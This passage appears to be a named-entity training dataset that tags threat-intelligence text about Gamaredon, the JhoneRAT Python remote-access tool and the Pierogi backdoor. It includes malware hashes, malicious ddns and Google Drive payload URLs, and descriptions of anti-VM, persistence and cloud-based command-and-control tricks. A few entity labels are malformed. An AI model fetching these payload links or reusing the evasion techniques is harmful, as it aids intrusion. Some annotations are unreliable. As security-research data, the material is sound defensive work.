+value O
+of O
+the O
+Driver B-TOOL
+SN E-TOOL
+installed O
+on O
+the O
+machine O
+and O
+returns O
+the O
+key O
+as O
+results O
+. O
+
+Gamaredon S-APT
+cyberwarfare O
+operations O
+against O
+Ukraine S-LOC
+are O
+still O
+active O
+. O
+
+This O
+technical O
+analysis O
+reveals O
+that O
+the O
+modus O
+operandi O
+of O
+the O
+Group O
+has O
+remained O
+almost O
+identical O
+over O
+the O
+years O
+. O
+
+The O
+massive O
+use O
+of O
+weaponized O
+Office S-TOOL
+documents O
+, O
+Office S-TOOL B-ACT
+template I-ACT
+injection E-ACT
+, O
+sfx B-TOOL
+archives E-TOOL
+, O
+wmi S-TOOL
+and O
+some O
+VBA B-TOOL
+macro I-TOOL
+stages S-TOOL E-TOOL
+that O
+dinamically O
+changes O
+,  O
+make O
+the O
+Pterodon S-MAL
+attack O
+chain O
+very O
+malleable O
+and O
+adaptive O
+. O
+
+However O
+, O
+the O
+introduction O
+of O
+a O
+.Net S-TOOL
+component O
+is O
+a O
+novelty O
+compared O
+to O
+previous O
+Pterodon S-MAL
+samples O
+. O
+
+Gamaredon S-APT
+: O
+76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a S-SHA2
+. O
+
+Gamaredon S-APT
+: O
+e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 S-SHA2
+. O
+
+Gamaredon S-APT
+: O
+def13f94cdf793df3e9b42b168550a09ee906f07f61a3f5c9d25ceca44e8068c S-SHA2
+. O
+
+Gamaredon S-APT
+: O
+c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f S-SHA2
+. O
+
+Gamaredon S-APT
+: O
+86977a785f361d4f26eb3e189293c0e30871de3c93b19653c26a31dd4ed068cc S-SHA2
+. O
+
+Gamaredon S-APT
+: O
+http://win-apu.ddns.net/apu.dot/ S-URL
+. O
+
+Gamaredon S-APT
+: O
+http://get-icons.ddns.net/apu.dot/ S-URL
+. O
+
+Gamaredon S-APT
+: O
+http://masseffect.space/ S-URL
+. O
+
+
+JhoneRAT S-MAL
+: O
+Cloud O
+based O
+python S-TOOL
+RAT S-TOOL
+targeting O
+Middle B-LOC
+Eastern I-LOC
+countries E-LOC
+. O
+
+Today O
+, O
+Cisco B-SECTEAM
+Talos E-SECTEAM
+is O
+unveiling O
+the O
+details O
+of O
+a O
+new O
+RAT S-TOOL
+we O
+have O
+identified O
+we O
+'re O
+calling O
+" O
+JhoneRAT S-MAL
+" O
+. O
+
+This O
+new O
+RAT S-TOOL
+is O
+dropped O
+to O
+the O
+victims O
+via O
+malicious O
+Microsoft B-TOOL
+Office B-IDTY I-TOOL E-IDTY
+docume S-TOOLnts E-TOOL
+. O
+
+The O
+dropper O
+, O
+along O
+with O
+the O
+Python B-TOOL
+RAT E-TOOL S-TOOL
+, O
+attempts O
+to O
+gather O
+information O
+on O
+the O
+victim O
+'s O
+machine O
+and O
+then O
+uses O
+multiple O
+cloud O
+services O
+: O
+Google B-TOOL
+Drive E-TOOL
+, O
+Twitter S-TOOL
+, O
+ImgBB S-TOOL
+and O
+Google B-TOOL
+Forms E-TOOL
+. O
+
+The O
+RAT S-TOOL
+attempts O
+to O
+download O
+additional O
+payloads O
+and O
+upload O
+the O
+information O
+gathered O
+during O
+the O
+reconnaissance O
+phase O
+. O
+
+This O
+particular O
+RAT S-TOOL
+attempts O
+to O
+target O
+a O
+very O
+specific O
+set O
+of O
+Arabic-speaking O
+countries O
+. O
+
+The O
+filtering O
+is O
+performed O
+by O
+checking O
+the O
+keyboard O
+layout O
+of O
+the O
+infected O
+systems O
+. O
+
+Based O
+on O
+the O
+analysed O
+sample O
+, O
+JhoneRAT S-MAL
+targets O
+Saudi B-LOC
+Arabia E-LOC
+, O
+Iraq S-LOC
+, O
+Egypt S-LOC
+, O
+Libya S-LOC
+, O
+Algeria S-LOC
+, O
+Morocco S-LOC
+, O
+Tunisia S-LOC
+, O
+Oman S-LOC
+, O
+Yemen S-LOC
+, O
+Syria S-LOC
+, O
+UAE S-LOC
+, O
+Kuwait S-LOC
+, O
+Bahrain S-LOC
+and O
+Lebanon S-LOC
+. O
+
+The O
+campaign O
+shows O
+an O
+actor O
+that O
+developed O
+a O
+homemade O
+RAT O
+that O
+works O
+in O
+multiple O
+layers O
+hosted O
+on O
+cloud O
+providers O
+. O
+
+JhoneRAT S-MAL
+is O
+developed O
+in O
+python S-TOOL
+but O
+not O
+based O
+on O
+public O
+source O
+code O
+, O
+as O
+it O
+is O
+often O
+the O
+case O
+for O
+this O
+type O
+of O
+malware O
+. O
+
+The O
+attackers O
+put O
+great O
+effort O
+to O
+carefully O
+select O
+the O
+targets O
+located O
+in O
+specific O
+countries O
+based O
+on O
+the O
+victim O
+'s O
+keyboard O
+layout O
+. O
+
+Everything O
+starts O
+with O
+a O
+malicious O
+document O
+using O
+a O
+well-known O
+vulnerability O
+to O
+download O
+a O
+malicious O
+document O
+hosted O
+on O
+the O
+internet O
+. O
+
+For O
+this O
+campaign O
+, O
+the O
+attacker O
+chose O
+to O
+use O
+a O
+cloud O
+provider O
+( O
+Google S-TOOL
+) O
+with O
+a O
+good O
+reputation O
+to O
+avoid O
+URL O
+blacklisting O
+. O
+
+The O
+malware O
+is O
+divided O
+into O
+a O
+couple O
+of O
+layers O
+— O
+each O
+layer O
+downloads O
+a O
+new O
+payload O
+on O
+a O
+cloud O
+provider O
+to O
+get O
+the O
+final O
+RAT S-TOOL
+developed O
+in O
+python S-TOOL
+and O
+that O
+uses O
+additional O
+providers O
+such O
+as O
+Twitter S-TOOL
+and O
+ImgBB S-TOOL
+. O
+
+This O
+RAT S-TOOL
+is O
+a O
+good O
+example O
+of O
+how O
+a O
+highly O
+focused O
+attack O
+that O
+tries O
+to O
+blend O
+its O
+network O
+traffic O
+into O
+the O
+crowd O
+can O
+be O
+highly O
+effective O
+. O
+
+In O
+this O
+campaign O
+, O
+focusing O
+detection O
+of O
+the O
+network O
+is O
+not O
+the O
+best O
+approach O
+. O
+
+Instead O
+, O
+the O
+detection O
+must O
+be O
+based O
+on O
+the O
+behaviour O
+on O
+the O
+operating O
+system O
+. O
+
+Attackers O
+can O
+abuse O
+well-known B-TOOL
+cloud I-TOOL
+providers E-TOOL
+and O
+abuse O
+their O
+reputations O
+in O
+order O
+to O
+avoid O
+detection O
+. O
+
+The O
+fact O
+that O
+this O
+attacker O
+decided O
+to O
+leverage O
+cloud B-TOOL
+services E-TOOL
+and O
+four B-TOOL
+different I-TOOL
+services E-TOOL
+— O
+and O
+not O
+their O
+own O
+infrastructure O
+— O
+is O
+smart O
+from O
+an O
+opsec O
+point O
+of O
+view O
+. O
+
+It O
+is O
+hard O
+for O
+the O
+targets O
+to O
+identify O
+legitimate O
+and O
+malicious O
+traffic O
+to O
+cloud O
+provider O
+infrastructure O
+. O
+
+Moreover O
+, O
+this O
+kind O
+of O
+infrastructure O
+uses O
+HTTPS S-PROT
+and O
+the O
+flow O
+is O
+encrypted O
+that O
+makes O
+man-in-the-middle O
+interception O
+more O
+complicated O
+for O
+the O
+defender O
+. O
+
+It O
+is O
+not O
+the O
+first O
+time O
+an O
+attacker O
+used O
+only O
+cloud B-TOOL
+providers E-TOOL
+. O
+
+Even O
+while O
+using O
+these O
+services O
+, O
+the O
+authors O
+of O
+this O
+JhoneRAT S-MAL
+went O
+further O
+and O
+used O
+different O
+user-agent O
+strings O
+depending O
+on O
+the O
+request O
+, O
+and O
+even O
+on O
+the O
+downloaders O
+the O
+authors O
+used O
+other O
+user-agent O
+strings O
+. O
+
+We O
+already O
+published O
+a O
+couple O
+of O
+articles O
+about O
+ROKRAT S-MAL
+( O
+here O
+, O
+here O
+, O
+here O
+and O
+here O
+) O
+where O
+another O
+unrelated O
+actor O
+, O
+Group123 S-APT
+, O
+made O
+the O
+same O
+choice O
+but O
+with O
+different O
+providers O
+. O
+
+The O
+attacker O
+implemented O
+filtering O
+based O
+on O
+the O
+keyboard O
+'s O
+layout O
+. O
+
+The O
+malware O
+is O
+executed O
+only O
+for O
+the O
+following O
+layout O
+, O
+the O
+country O
+is O
+based O
+on O
+the O
+Microsoft S-IDTY
+website O
+: O
+
+' O
+0401 O
+' O
+: O
+Saudi B-LOC
+Arabia E-LOC
+. O
+' O
+0801 O
+' O
+: O
+Iraq S-LOC
+. O
+' O
+0c01 O
+' O
+: O
+Egypt S-LOC
+. O
+' O
+1001 O
+' O
+: O
+Libya S-LOC
+. O
+' O
+1401 O
+' O
+: O
+Algeria S-LOC
+. O
+' O
+1801 O
+' O
+: O
+Morocco S-LOC
+. O
+' O
+1c01 O
+' O
+: O
+Tunisia S-LOC
+. O
+' O
+2001 O
+' O
+: O
+Oman S-LOC
+. O
+' O
+2401 O
+' O
+: O
+Yemen S-LOC
+. O
+' O
+2801 O
+' O
+: O
+Syria S-LOC
+. O
+' O
+3801 O
+' O
+: O
+UAE S-LOC
+. O
+' O
+3401 O
+' O
+: O
+Kuwait S-LOC
+. O
+' O
+3c01 O
+' O
+: O
+Bahrain S-LOC
+. O
+' O
+3001 O
+' O
+: O
+Lebanon S-LOC
+. O
+
+We O
+identified O
+three O
+malicious O
+Microsoft B-TOOL
+Office B-IDTY I-TOOL E-IDTY
+documents E-TOOL
+that O
+download O
+and O
+load O
+an O
+additional O
+Office O
+document O
+with O
+a O
+Macro S-TOOL
+. O
+
+The O
+oldest O
+one O
+from O
+November B-TIME
+2019 E-TIME
+, O
+named O
+" O
+Urgent.docx S-FILE
+" O
+. O
+
+The O
+author O
+of O
+the O
+document O
+asks O
+to O
+enable O
+editing O
+in O
+English O
+and O
+in O
+Arabic O
+. O
+
+The O
+second O
+document O
+from O
+the O
+beginning B-TIME
+of I-TIME
+January E-TIME
+is O
+named O
+" O
+fb.docx S-FILE
+" O
+and O
+contains O
+usernames O
+and O
+passwords O
+from O
+an O
+alleged O
+" O
+Facebook S-TOOL
+" O
+leak O
+. O
+
+The O
+more O
+recent O
+document O
+is O
+from O
+mid-January S-TIME
+and O
+alleged O
+to O
+be O
+from O
+a O
+United B-LOC
+Arab I-LOC
+Emirate E-LOC
+organization O
+. O
+
+The O
+author O
+blurred O
+the O
+content O
+and O
+asks O
+the O
+user O
+to O
+enable O
+editing O
+to O
+see O
+the O
+content O
+. O
+
+In O
+the O
+three O
+documents O
+, O
+an O
+additional O
+Office B-TOOL
+document E-TOOL
+containing O
+a O
+Macro S-TOOL
+is O
+downloaded O
+and O
+executed O
+. O
+
+The O
+documents O
+are O
+located O
+on O
+Google B-TOOL
+Drive E-TOOL
+. O
+
+The O
+template O
+located O
+on O
+Google B-TOOL
+Drive E-TOOL
+contains O
+a O
+macro S-TOOL
+. O
+
+The O
+macro O
+contains O
+a O
+virtual O
+machine O
+detection O
+technique O
+based O
+on O
+the O
+serial O
+number O
+of O
+the O
+disks O
+available O
+in O
+the O
+victim O
+environment O
+. O
+
+Indeed O
+, O
+some O
+VMs S-TOOL
+do O
+not O
+have O
+serial O
+numbers O
+and O
+the O
+macro O
+is O
+executed O
+only O
+if O
+a O
+serial O
+number O
+exists O
+. O
+
+A O
+WMIC S-TOOL
+command O
+is O
+executed O
+to O
+get O
+this O
+information O
+on O
+the O
+targeted O
+system O
+. O
+
+If O
+a O
+serial O
+number O
+exists O
+, O
+the O
+rest O
+of O
+the O
+code O
+is O
+executed O
+. O
+
+The O
+purpose O
+is O
+to O
+download O
+an O
+image O
+from O
+a O
+new O
+Google O
+Drive O
+link O
+. O
+
+It O
+is O
+interesting O
+to O
+note O
+that O
+the O
+filename O
+of O
+the O
+downloaded O
+image O
+is O
+randomly O
+generated O
+based O
+on O
+a O
+dictionary O
+: O
+Array O
+("cartoon" O
+, O
+"img" O
+,"photo") O
+. O
+
+The O
+filename O
+will O
+be O
+cartoon.jpg S-FILE
+or O
+img.jpg S-FILE
+or O
+photo.jpg S-FILE
+and O
+the O
+image O
+usually O
+depicts O
+a O
+cartoon O
+. O
+
+The O
+image O
+file O
+is O
+a O
+real O
+image O
+with O
+a O
+base64-encoded S-ENCR
+binary O
+appended O
+at O
+the O
+end O
+. O
+
+The O
+malware O
+author O
+has O
+a O
+curious O
+sense O
+of O
+humor O
+. O
+
+The O
+base64 S-ENCR
+data O
+and O
+image O
+are O
+separated O
+by O
+the O
+" O
+**** O
+" O
+string O
+. O
+
+The O
+decoded O
+binary O
+filename O
+is O
+also O
+randomly O
+generated O
+based O
+on O
+a O
+dictionary O
+: O
+Array("proc" O
+, O
+"chrome" O
+, O
+"winrar") O
+. O
+
+It O
+can O
+be O
+proc.exe S-FILE
+or O
+chrome.exe S-FILE
+or O
+winrar.exe S-FILE
+. O
+
+The O
+decoded O
+base64 S-ENCR
+data O
+is O
+an O
+AutoIT S-TOOL
+binary O
+. O
+
+This O
+binary O
+downloads O
+a O
+new O
+file O
+on O
+Google B-TOOL
+Drive E-TOOL
+. O
+
+The O
+filename O
+is O
+also O
+randomly O
+generated O
+based O
+on O
+a O
+dictionary O
+$ARRAY[5]=["prc" O
+,"winrar" O
+,"chrome" O
+,"sync" O
+,"COM O
+surr"] O
+. O
+
+The O
+final O
+payload O
+is O
+a O
+remote B-TOOL
+access I-TOOL
+tool E-TOOL
+( O
+RAT S-TOOL
+) O
+written O
+in O
+python S-TOOL
+. O
+
+We O
+named O
+this O
+RAT S-TOOL
+" O
+JhoneRAT S-MAL
+" O
+. O
+
+The O
+python S-TOOL
+code O
+is O
+wrapped O
+into O
+an O
+executable O
+using O
+pyinstaller O
+. O
+
+It O
+uses O
+minimal O
+obfuscation O
+applied O
+only O
+on O
+variables O
+and O
+function O
+naming O
+. O
+
+The O
+RAT S-TOOL
+starts O
+by O
+launching O
+three O
+threads O
+. O
+
+The O
+first O
+is O
+responsible O
+for O
+checking O
+if O
+the O
+system O
+has O
+the O
+targeted O
+keyboard O
+layout O
+— O
+this O
+is O
+exclusively O
+in O
+Arabic-speaking O
+countries O
+. O
+
+The O
+second O
+will O
+create O
+the O
+persistence O
+and O
+, O
+finally O
+, O
+the O
+last O
+one O
+to O
+be O
+started O
+is O
+the O
+main O
+cycle O
+for O
+the O
+RAT S-TOOL
+. O
+
+As O
+we O
+explained O
+before O
+, O
+the O
+RAT S-TOOL
+targets O
+specific O
+countries O
+by O
+checking O
+the O
+keyboard O
+'s O
+layout O
+. O
+
+In O
+fact O
+, O
+this O
+is O
+one O
+of O
+the O
+first O
+checks O
+it O
+performs O
+when O
+it O
+is O
+executed O
+. O
+
+The O
+persistence O
+is O
+achieved O
+by O
+adding O
+an O
+entry O
+with O
+the O
+name O
+" O
+ChromeUpdater O
+" O
+to O
+the O
+' O
+Software\\Microsoft\\Windows\\CurrentVersion\\Run O
+' O
+. O
+
+This O
+RAT S-TOOL
+uses O
+three O
+different O
+cloud O
+services O
+to O
+perform O
+all O
+its O
+command B-TOOL
+and I-TOOL
+control E-TOOL
+( O
+C2 S-TOOL
+) O
+activities O
+. O
+
+It O
+checks O
+for O
+new O
+commands O
+in O
+the O
+tweets O
+from O
+the O
+handle O
+@jhone87438316 O
+( O
+suspended O
+by O
+Twitter S-TOOL
+) O
+every O
+10 O
+seconds O
+using O
+the O
+BeautifulSoup B-TOOL
+HTML I-TOOL
+parser E-TOOL
+to O
+identify O
+new O
+tweets O
+. O
+
+These O
+commands O
+can O
+be O
+issued O
+to O
+a O
+specific O
+victim O
+based O
+on O
+the O
+UID O
+generated O
+on O
+each O
+target O
+( O
+by O
+using O
+the O
+disk O
+serial O
+and O
+contextual O
+information O
+such O
+as O
+the O
+hostname O
+, O
+the O
+antivirus O
+and O
+the O
+OS O
+) O
+or O
+to O
+all O
+of O
+them O
+. O
+
+The O
+Exfiltration S-ACT
+, O
+however O
+, O
+is O
+done O
+via O
+other O
+cloud B-TOOL
+providers E-TOOL
+. O
+
+The O
+screenshots O
+are O
+exfiltrated O
+via O
+the O
+ImgBB S-TOOL
+website O
+. O
+
+The O
+remaining O
+commands O
+send O
+feedback O
+by O
+posting O
+data O
+into O
+Google B-TOOL
+Forms E-TOOL
+. O
+
+Finally O
+, O
+the O
+RAT S-TOOL
+is O
+able O
+to O
+download O
+files O
+encoded O
+in O
+base64 S-ENCR
+on O
+Google B-TOOL
+Drive E-TOOL
+. O
+
+Feature-wise O
+, O
+the O
+RAT S-TOOL
+has O
+three O
+commands O
+: O
+
+Take O
+a O
+screenshot O
+and O
+upload O
+it O
+to O
+ImgBB S-TOOL
+. O
+
+Download O
+binary O
+disguised O
+has O
+a O
+picture O
+from O
+Google B-TOOL
+Drive E-TOOL
+and O
+execute O
+it O
+. O
+
+Execute O
+a O
+command O
+and O
+send O
+the O
+output O
+to O
+Google B-TOOL
+Forms E-TOOL
+. O
+
+The O
+attacker O
+put O
+a O
+couple O
+of O
+tricks O
+in O
+place O
+to O
+avoid O
+execution O
+on O
+virtual O
+machines O
+( O
+sandbox S-TOOL
+) O
+. O
+
+The O
+first O
+trick O
+is O
+the O
+check O
+of O
+the O
+serial O
+number O
+of O
+the O
+disk O
+. O
+
+The O
+actor O
+used O
+the O
+same O
+technique O
+in O
+the O
+macro S-TOOL
+and O
+in O
+the O
+JhoneRAT S-MAL
+. O
+
+By O
+default O
+, O
+most O
+of O
+the O
+virtual O
+machines O
+do O
+not O
+have O
+a O
+serial O
+number O
+on O
+the O
+disk O
+. O
+
+The O
+attacker O
+used O
+a O
+second O
+trick O
+to O
+avoid O
+analysis O
+of O
+the O
+python S-TOOL
+code O
+. O
+
+The O
+actor O
+used O
+the O
+same O
+trick O
+that O
+FireEye S-SECTEAM
+in O
+the O
+Flare-On B-TOOL
+6 E-TOOL
+: O
+Challenge O
+7: O
+They O
+removed O
+the O
+header O
+of O
+the O
+python S-TOOL
+bytecode O
+. O
+
+It O
+can O
+be O
+perfectly O
+executed O
+without O
+the O
+header O
+, O
+but O
+tools O
+such O
+as O
+uncompyle6 S-TOOL
+need O
+this O
+header O
+: O
+$ O
+uncompyle6 S-TOOL
+final2 O
+. O
+
+ImportError O
+: O
+Unknown O
+magic O
+number O
+227 O
+in O
+final2 O
+. O
+
+Additionally O
+, O
+the O
+generated O
+code O
+by O
+uncompyle6 S-TOOL
+varies O
+depending O
+on O
+the O
+version O
+and O
+the O
+impact O
+is O
+important O
+. O
+
+Based O
+on O
+our O
+analysis O
+and O
+the O
+behaviour O
+of O
+the O
+executed O
+malware O
+, O
+the O
+correct O
+interpretation O
+is O
+the O
+first O
+one O
+based O
+on O
+the O
+oldest O
+version O
+of O
+uncompyle6 S-TOOL
+. O
+
+For O
+this O
+specific O
+condition O
+, O
+it O
+is O
+important O
+because O
+it O
+'s O
+filtering O
+on O
+the O
+keyboard O
+layout O
+to O
+identify O
+the O
+targets O
+. O
+
+This O
+campaign O
+shows O
+a O
+threat O
+actor O
+interested O
+in O
+specific O
+Middle B-LOC
+Eastern E-LOC
+and O
+Arabic-speaking O
+countries O
+. O
+
+It O
+also O
+shows O
+us O
+an O
+actor O
+that O
+puts O
+effort O
+in O
+opsec S-TOOL
+by O
+only O
+using O
+cloud B-TOOL
+providers E-TOOL
+. O
+
+The O
+malicious O
+documents O
+, O
+the O
+droppers O
+and O
+the O
+RAT S-TOOL
+itself O
+are O
+developed O
+around O
+cloud B-TOOL
+providers E-TOOL
+. O
+
+Additionally O
+the O
+attackers O
+implemented O
+anti-VM S-TOOL
+( O
+and O
+sandbox S-TOOL
+) O
+and O
+anti-analysis B-TOOL
+tricks E-TOOL
+to O
+hide O
+the O
+malicious O
+activities O
+to O
+the O
+analyst O
+. O
+
+For O
+example O
+, O
+the O
+VM S-TOOL
+or O
+the O
+sandbox S-TOOL
+must O
+have O
+the O
+keyboard O
+layout O
+of O
+the O
+targeted O
+countries O
+and O
+a O
+disk O
+serial O
+number O
+. O
+
+This O
+campaign O
+started O
+in O
+November B-TIME
+2019 E-TIME
+and O
+it O
+is O
+still O
+ongoing O
+. O
+
+At O
+this O
+time O
+, O
+the O
+API O
+key O
+is O
+revoked O
+and O
+the O
+Twitter S-TOOL
+account O
+is O
+suspended O
+. O
+
+However O
+, O
+the O
+attacker O
+can O
+easily O
+create O
+new O
+accounts O
+and O
+update O
+the O
+malicious O
+files O
+in O
+order O
+to O
+still O
+work O
+. O
+
+This O
+campaign O
+shows O
+us O
+that O
+network-based O
+detection O
+is O
+important O
+but O
+must O
+be O
+completed O
+by O
+system O
+behaviour O
+analysis O
+. O
+
+JhoneRAT S-MAL
+: O
+273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f S-SHA2
+. O
+
+JhoneRAT S-MAL
+: O
+29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091 S-SHA2
+. O
+
+JhoneRAT S-MAL
+: O
+d5f10a0b5c103100a3e74aa9014032c47aa8973b564b3ab03ae817744e74d079 S-SHA2
+. O
+
+JhoneRAT S-MAL
+: O
+6cc0c11c754e1e82bca8572785c27a364a18b0822c07ad9aa2dc26b3817b8aa4 S-SHA2
+. O
+
+JhoneRAT S-MAL
+: O
+7e1121fca3ac7c2a447b61cda997f3a8202a36bf9bb08cca3402df95debafa69 S-SHA2
+. O
+
+JhoneRAT S-MAL
+: O
+b4a43b108989d1dde87e58f1fd6f81252ef6ae19d2a5e8cd76440135e0fd6366 S-SHA2
+. O
+
+JhoneRAT S-MAL
+: O
+https://drive.google.com/uc?export=download&amp;id=1vED0wN0arm9yu7C7XrbCdspLjpoPKfrQ S-MAL
+. O
+
+JhoneRAT S-MAL
+: O
+https://drive.google.com/uc?export=download&amp;id=1LVdv4bjcQegPdKrc5WLb4W7ad6Zt80zl S-DOM
+. O
+
+JhoneRAT S-MAL
+: O
+https://drive.google.com/uc?export=download&amp;id=1OlQssMvjb7gI175qDx8SqTgRJIEp5Ypd S-DOM
+. O
+
+JhoneRAT S-MAL
+: O
+https://drive.google.com/uc?export=download&id=1d-toE89QnN5ZhuNZIc2iF4-cbKWtk0FD S-DOM
+. O
+
+JhoneRAT S-MAL
+: O
+https://drive.google.com/uc?export=download&id=1kbHVkvPIjX49qJ62TBz6drW2YPiiaX2a S-DOM
+. O
+
+JhoneRAT S-MAL
+: O
+https://twitter.com/jhone87438316 S-DOM
+. O
+
+
+New O
+Cyber O
+Espionage O
+Campaigns O
+Targeting O
+Palestinians S-LOC
+- O
+Part O
+2 O
+: O
+The O
+Discovery O
+of O
+the O
+New O
+, O
+Mysterious O
+Pierogi B-MAL
+backdoor E-MAL
+. O
+
+Since O
+December B-TIME
+2019 E-TIME
+, O
+the O
+Cybereason B-SECTEAM
+Nocturnus E-SECTEAM
+team O
+has O
+been O
+investigating O
+a O
+campaign O
+targeting O
+Palestinian O
+individuals O
+and O
+entities O
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+mostly O
+within O
+the O
+Palestinian B-LOC
+territories E-LOC
+. O
+
+This O
+campaign O
+uses O
+social O
+engineering O
+and O
+decoy O
+documents O
+related O
+to O
+geopolitical O
+affairs O
+and O
+relations O
+between O
+the O
+Palestinian B-IDTY
+government E-IDTY
+, O
+and O
+references O
+Egypt S-LOC
+, O
+Hezbollah S-LOC
+, O
+and O
+Iran S-LOC
+. O
+
+Part O
+one O
+of O
+this O
+research O
+investigates O
+the O
+Spark B-ACT
+campaign E-ACT
+, O
+where O
+attackers O
+use O
+social O
+engineering O
+to O
+infect O
+victims O
+, O
+mainly O
+from O
+the O
+Palestinian B-LOC
+territories E-LOC
+, O
+with O
+the O
+Spark B-MAL
+backdoor E-MAL
+. O
+
+For O
+more O
+information O
+about O
+part O
+one O
+, O
+click O
+here O
+. O
+
+During O
+the O
+attacks O
+, O
+victims O
+are O
+infected O
+with O
+a O
+previously O
+undocumented O
+backdoor S-MAL
+, O
+dubbed O
+Pierogi S-MAL
+by O
+Cybereason S-IDTY
+. O
+
+This O
+backdoor S-MAL
+allows O
+attackers O
+to O
+spy O
+on O
+targeted O
+victims O
+. O
+
+Cybereason S-IDTY
+suspects O
+that O
+the O
+backdoor S-MAL
+may O
+have O
+been O
+obtained O
+in O
+underground O
+communities O
+rather O
+than O
+home-grown O
+, O
+as O
+the O
+evidence O
+found O
+in O
+the O
+code O
+of O
+the O
+backdoor O
+suggests O
+it O
+may O
+have O
+been O
+developed O
+by O
+Ukranian-speaking O
+hackers O
+. O
+
+The O
+tactics O
+, O
+techniques O
+, O
+and O
+procedures O
+( O
+TTPs O
+) O
+, O
+content O
+, O
+and O
+theme O
+of O
+the O
+decoy O
+documents O
+, O
+as O
+well O
+as O
+the O
+victimology O
+observed O
+in O
+the O
+campaign O
+, O
+resemble O
+previous O
+attacks O
+that O
+have O
+targeted O
+Palestinians O
+. O
+
+In O
+particular O
+, O
+these O
+campaigns O
+appear O
+to O
+be O
+related O
+to O
+attacks O
+carried O
+out O
+by O
+a O
+group O
+called O
+MoleRATs S-APT
+( O
+aka O
+, O
+Gaza B-APT
+Cyber I-APT
+Gang E-APT
+, O
+Moonlight S-APT
+) O
+, O
+an O
+Arabic-speaking O
+, O
+politically O
+motivated O
+group O
+that O
+has O
+been O
+operating O
+in O
+the O
+Middle B-LOC
+East E-LOC
+since O
+2012 S-TIME
+. O
+
+Cyber O
+Espionage O
+with O
+a O
+New O
+Malware O
+: O
+The O
+Cybereason B-SECTEAM
+Nocturnus E-SECTEAM
+team O
+has O
+discovered O
+recent O
+, O
+targeted O
+attacks O
+in O
+the O
+Middle B-LOC
+East E-LOC
+to O
+deliver O
+the O
+Pierogi B-MAL
+backdoor E-MAL
+for O
+politically-driven O
+cyber O
+espionage O
+. O
+
+Targeting O
+Palestinians S-LOC
+: O
+The O
+campaigns O
+seems O
+to O
+target O
+Palestinian O
+individuals O
+and O
+entities O
+, O
+likely O
+related O
+to O
+the O
+Palestinian B-IDTY
+government E-IDTY
+. O
+
+Using O
+Geopolitically-charged O
+Lure O
+Content O
+: O
+The O
+attackers O
+use O
+specially O
+crafted O
+lure O
+content O
+to O
+trick O
+their O
+targets O
+into O
+opening O
+malicious O
+files O
+that O
+infect O
+the O
+victim O
+’s O
+machine O
+with O
+the O
+Pierogi B-MAL
+backdoor E-MAL
+. O
+
+The O
+decoy O
+content O
+of O
+the O
+malicious O
+files O
+revolves O
+around O
+various O
+political O
+affairs O
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+specifically O
+targeting O
+the O
+tension O
+between O
+Hamas S-LOC
+and O
+other O
+entities O
+in O
+the O
+region O
+. O
+
+Perpetrated O
+by O
+an O
+Arabic-speaking O
+APT O
+, O
+MoleRATs S-APT
+: O
+The O
+modus-operandi O
+of O
+the O
+attackers O
+as O
+well O
+as O
+the O
+social O
+engineering O
+decoy O
+content O
+seem O
+aligned O
+with O
+previous O
+attacks O
+carried O
+out O
+by O
+an O
+Arabic-speaking O
+APT O
+group O
+called O
+MoleRATs S-APT
+( O
+aka O
+Gaza B-APT
+Cybergang E-APT
+) O
+. O
+
+This O
+group O
+has O
+been O
+operating O
+in O
+the O
+Middle B-LOC
+East E-LOC
+since O
+2012 S-TIME
+. O
+
+Similar O
+to O
+previous O
+attacks O
+, O
+this O
+campaign O
+starts O
+with O
+social O
+engineering O
+. O
+
+In O
+one O
+instance O
+, O
+it O
+lures O
+victims O
+to O
+open O
+an O
+email S-TOOL
+attachment O
+. O
+
+In O
+others O
+, O
+it O
+persuades O
+victims O
+to O
+download O
+a O
+report O
+about O
+a O
+recent O
+political O
+affair O
+pertaining O
+to O
+the O
+Middle B-LOC
+East E-LOC
+and O
+specifically O
+to O
+Palestinian O
+matters O
+. O
+
+In O
+most O
+cases O
+, O
+the O
+downloaded O
+file O
+is O
+either O
+an O
+executable O
+that O
+masquerades O
+as O
+a O
+Microsoft B-TOOL
+Word I-TOOL
+document E-TOOL
+or O
+a O
+weaponized B-TOOL
+Microsoft I-TOOL
+Word E-TOOL
+document O
+. O
+
+As O
+soon O
+as O
+the O
+victim O
+double-clicks O
+on O
+the O
+dropper O
+, O
+they O
+are O
+presented O
+with O
+the O
+decoy O
+document O
+. O
+
+The O
+document O
+lowers O
+the O
+victim O
+’s O
+suspicions O
+by O
+distracting O
+them O
+with O
+a O
+real O
+document O
+while O
+the O
+dropper O
+installs O
+the O
+backdoor S-MAL
+. O
+
+However O
+, O
+some O
+of O
+the O
+documents O
+also O
+play O
+an O
+additional O
+role O
+in O
+the O
+attack O
+. O
+
+While O
+some O
+are O
+more O
+neutral O
+, O
+quoting O
+from O
+newspapers O
+and O
+the O
+media O
+, O
+others O
+seem O
+to O
+report O
+fake O
+news O
+to O
+spread O
+misinformation O
+that O
+serves O
+a O
+political O
+agenda O
+. O
+
+With O
+regards O
+to O
+decoy O
+content O
+themes O
+, O
+this O
+campaign O
+resembles O
+previous O
+campaigns O
+reported O
+in O
+blogs O
+by O
+Vectra O
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+, O
+and O
+Talos S-SECTEAM
+. O
+
+The O
+contents O
+of O
+the O
+decoy O
+documents O
+seems O
+to O
+include O
+: O
+
+Potentially O
+fake O
+documents O
+that O
+appear O
+to O
+be O
+issued O
+by O
+the O
+Palestinian B-IDTY
+government E-IDTY
+. O
+
+Meetings O
+minutes O
+of O
+different O
+Palestinian S-LOC
+organizations O
+. O
+
+News O
+about O
+Hamas S-LOC
+and O
+the O
+Palestinian B-IDTY
+National I-IDTY
+Authority E-IDTY
+. O
+
+Potentially O
+fake O
+, O
+leaked O
+Hamas S-LOC
+documents O
+. O
+
+Criticism O
+of O
+and O
+embarrassing O
+content O
+about O
+Hamas S-LOC
+. O
+
+APA S-IDTY B-FILE
+adopted I-FILE
+resolution I-FILE
+Unlimited I-FILE
+support I-FILE
+for I-FILE
+Palestinian I-FILE
+people.docx E-FILE
+: O
+
+Describes O
